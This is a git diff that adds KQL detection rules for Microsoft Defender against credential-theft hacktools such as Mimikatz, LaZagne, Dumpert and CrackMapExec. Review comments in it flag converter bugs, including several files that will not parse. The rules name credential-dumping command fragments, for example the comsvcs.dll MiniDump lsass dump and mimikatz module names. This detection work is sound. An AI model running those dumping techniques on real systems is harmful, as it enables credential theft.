diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql
new file mode 100644
index 00000000..67ec6831
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects file creation events with filename patterns used by CrackMapExec.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
new file mode 100644
index 00000000..83fdab97
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - CrackMapExec Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-12
+// Level: high
+// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql
new file mode 100644
index 00000000..0dfcd2dc
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Default File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
new file mode 100644
index 00000000..c57008c1
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Dumpert Process Dumper Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceProcessEvents
+| where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
new file mode 100644
index 00000000..e4f6d8f5
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
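Review bot: `MD5 startswith "09D278F9DE118EF09163C6140255C690"` in the Dumpert Execution hunk compares a full 32-hex value with startswith, which only makes sense if the source selector was a wildcard over a combined hash field; if the upstream rule keyed this on an import hash rather than a file MD5, mapping it onto Defender's MD5 column will never match, because that column is the file's content hash. Worth checking the source rule; if it is an import hash there is no Defender column that carries it, and the file should say so, e.g. `// Import-hash indicator dropped: no import-hash column in DeviceProcessEvents; only the Dumpert.dll branch is effective`. If it really is a file MD5, an exact `MD5 =~ "09D278F9DE118EF09163C6140255C690"` is the clearer form.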
@@ -0,0 +1,12 @@
+// Title: Hacktool Execution - PE Metadata
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
new file mode 100644
index 00000000..b406a4b5
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Hashcat Password Cracker Execution
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110.002
+// False Positives:
+// - Tools that use similar command line flags and values
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
new file mode 100644
index 00000000..cb8dc0bd
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Hydra Password Bruteforce Execution
+// Author: Vasiliy Burov
+// Date: 2020-10-05
+// Level: high
+// Description: Detects command line parameters used by Hydra password guessing hack tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110, attack.t1110.001
+// False Positives:
+// - Software that uses the caret encased keywords PASS and USER in its command line
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
new file mode 100644
index 00000000..8210e8f2
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Impacket File Indicators
+// Author: The DFIR Report, IrishDeath
+// Date: 2025-05-19
+// Level: high
+// Description: Detects file creation events with filename patterns used by Impacket.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql
new file mode 100644
index 00000000..dedcb6d2
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Inveigh Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
new file mode 100644
index 00000000..a733abc0
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - KrbRelay Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the use of KrbRelay, a Kerberos relaying tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
new file mode 100644
index 00000000..39e5888b
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
@@ -0,0 +1,14 @@
+// Title: HackTool - LaZagne Execution
+// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
+LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+// False Positives:
+// - Some false positive is expected from tools with similar command line flags.
+
+DeviceProcessEvents
+| where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or 
FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or 
ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains "-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
new file mode 100644
index 00000000..176f3c7c
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Mimikatz Execution
+// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
+// Date: 2019-10-22
+// Level: high
+// Description: Detection well-known mimikatz command line arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
new file mode 100644
index 00000000..61235ab3
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Mimikatz Kirbi File Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE
+// Date: 2021-11-08
+// Level: critical
+// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
new file mode 100644
index 00000000..2496574f
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - NPPSpy Hacktool Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceFileEvents
+| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
new file mode 100644
index 00000000..b60b4fe2
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
+// Author: SecurityAura
+// Date: 2022-11-16
+// Level: high
+// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
new file mode 100644
index 00000000..87a112ad
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - Pypykatz Credentials Dumping Activity
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
new file mode 100644
index 00000000..a002049e
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Quarks PwDump Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
+// Description: Detects usage of the Quarks PwDump tool via commandline arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
new file mode 100644
index 00000000..fd78877b
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
@@ -0,0 +1,10 @@
+// Title: HackTool - QuarksPwDump Dump File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-10
+// Level: critical
+// Description: Detects a dump file written by QuarksPwDump password dumper
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\SAM-" and FolderPath contains ".dmp"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
new file mode 100644
index 00000000..f71507b9
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
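Review bot: In hacktool_quarks_pwdump_execution.kql the clause `ProcessCommandLine in~ (" -dhl", " --dump-hash-local", ...)` compares the entire command line for case-insensitive equality against each flag, so a command line that merely contains one of them never matches and only the `FolderPath endswith` branch is live. The leading and trailing spaces in the values show the source rule intended substring matching, which is what the neighbouring rules in this patch render as an `or` chain of `contains`. Rewrite it as `(ProcessCommandLine contains " -dhl" or ProcessCommandLine contains " --dump-hash-local" or ProcessCommandLine contains " -dhdc" or ... or ProcessCommandLine contains "--ntds-file")`. Since this looks like a converter mapping of a `contains`-list to `in~`, the same pattern is worth grepping for in the other generated files; `in~` is only right on exact-name fields such as `ProcessVersionInfoOriginalFileName`.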
@@ -0,0 +1,13 @@
+// Title: HackTool - RemoteKrbRelay Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-06-27
+// Level: high
+// Description: Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\RemoteKrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "RemoteKrbRelay.exe") or (ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -target " and ProcessCommandLine contains " -victim ") or (ProcessCommandLine contains "-rbcd " and (ProcessCommandLine contains "-cn " or ProcessCommandLine contains "--computername ")) or (ProcessCommandLine contains "-chp " and (ProcessCommandLine contains "-chpPass " and ProcessCommandLine contains "-chpUser ")) or (ProcessCommandLine contains "-addgroupmember " and ProcessCommandLine contains "-group " and ProcessCommandLine contains "-groupuser ") or ((ProcessCommandLine contains "interactive" or ProcessCommandLine contains "secrets" or ProcessCommandLine contains "service-add") and (ProcessCommandLine contains "-smb " and ProcessCommandLine contains "--smbkeyword "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
new file mode 100644
index 00000000..642a7667
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_safetykatz_dump_indicator.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Dump Indicator
+// Author: Markus Neis
+// Date: 2018-07-24
+// Level: high
+// Description: Detects default lsass dump filename generated by SafetyKatz.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate files with similar filename structure
+
+DeviceFileEvents
+| where FolderPath endswith "\\Temp\\debug.bin"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
new file mode 100644
index 00000000..da8d62a6
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SafetyKatz Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-20
+// Level: critical
+// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
new file mode 100644
index 00000000..84427743
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - SecurityXploded Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-12-19
+// Level: critical
+// Description: Detects the execution of SecurityXploded Tools
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
new file mode 100644
index 00000000..a3e59eb1
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_typical_hivenightmare_sam_file_export.kql
@@ -0,0 +1,12 @@
+// Title: HackTool - Typical HiveNightmare SAM File Export
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-23
+// Level: high
+// Description: Detects files written by the different tools that exploit HiveNightmare
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, cve.2021-36934
+// False Positives:
+// - Files that accidentally contain these strings
+
+DeviceFileEvents
+| where (FolderPath contains "\\hive_sam_" or FolderPath contains "\\SAM-2021-" or FolderPath contains "\\SAM-2022-" or FolderPath contains "\\SAM-2023-" or FolderPath contains "\\SAM-haxx" or FolderPath contains "\\Sam.save") or FolderPath =~ "C:\\windows\\temp\\sam"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
new file mode 100644
index 00000000..44f3e002
--- /dev/null
+++ b/KQL/rules/Credential Access/hacktool_winpwn_execution.kql
@@ -0,0 +1,11 @@
+// Title: HackTool - WinPwn Execution
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-12-04
+// Level: high
+// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.discovery, attack.execution, attack.privilege-escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
new file mode 100644
index 00000000..f65cbe0d
--- /dev/null
+++ b/KQL/rules/Credential Access/interesting_service_enumeration_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Interesting Service Enumeration Via Sc.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: low
+// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
+Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
+
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
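Review bot: In interesting_service_enumeration_via_sc_exe.kql the second line of the multi-line description, `Attackers often try to enumerate the services ...`, is emitted without the `//` prefix, so it lands in the query body as bare text and the file will not parse. The converter needs to prefix every line of a multi-line description (`// Attackers often try ...`) rather than only the first; the same breakage is visible in loaded_module_enumeration_via_tasklist_exe.kql, new_generic_credentials_added_via_cmdkey_exe.kql and permission_misconfiguration_reconnaissance_via_findstr_exe.kql, and any other rule with a multi-line `description` will be affected. A cheap guard for this repository is a CI step that runs each generated file through a KQL parser, or at minimum asserts that every non-empty line before the table name starts with `//`.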
diff --git a/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
new file mode 100644
index 00000000..5581b8b5
--- /dev/null
+++ b/KQL/rules/Credential Access/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -0,0 +1,12 @@
+// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Thomas Patzke
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
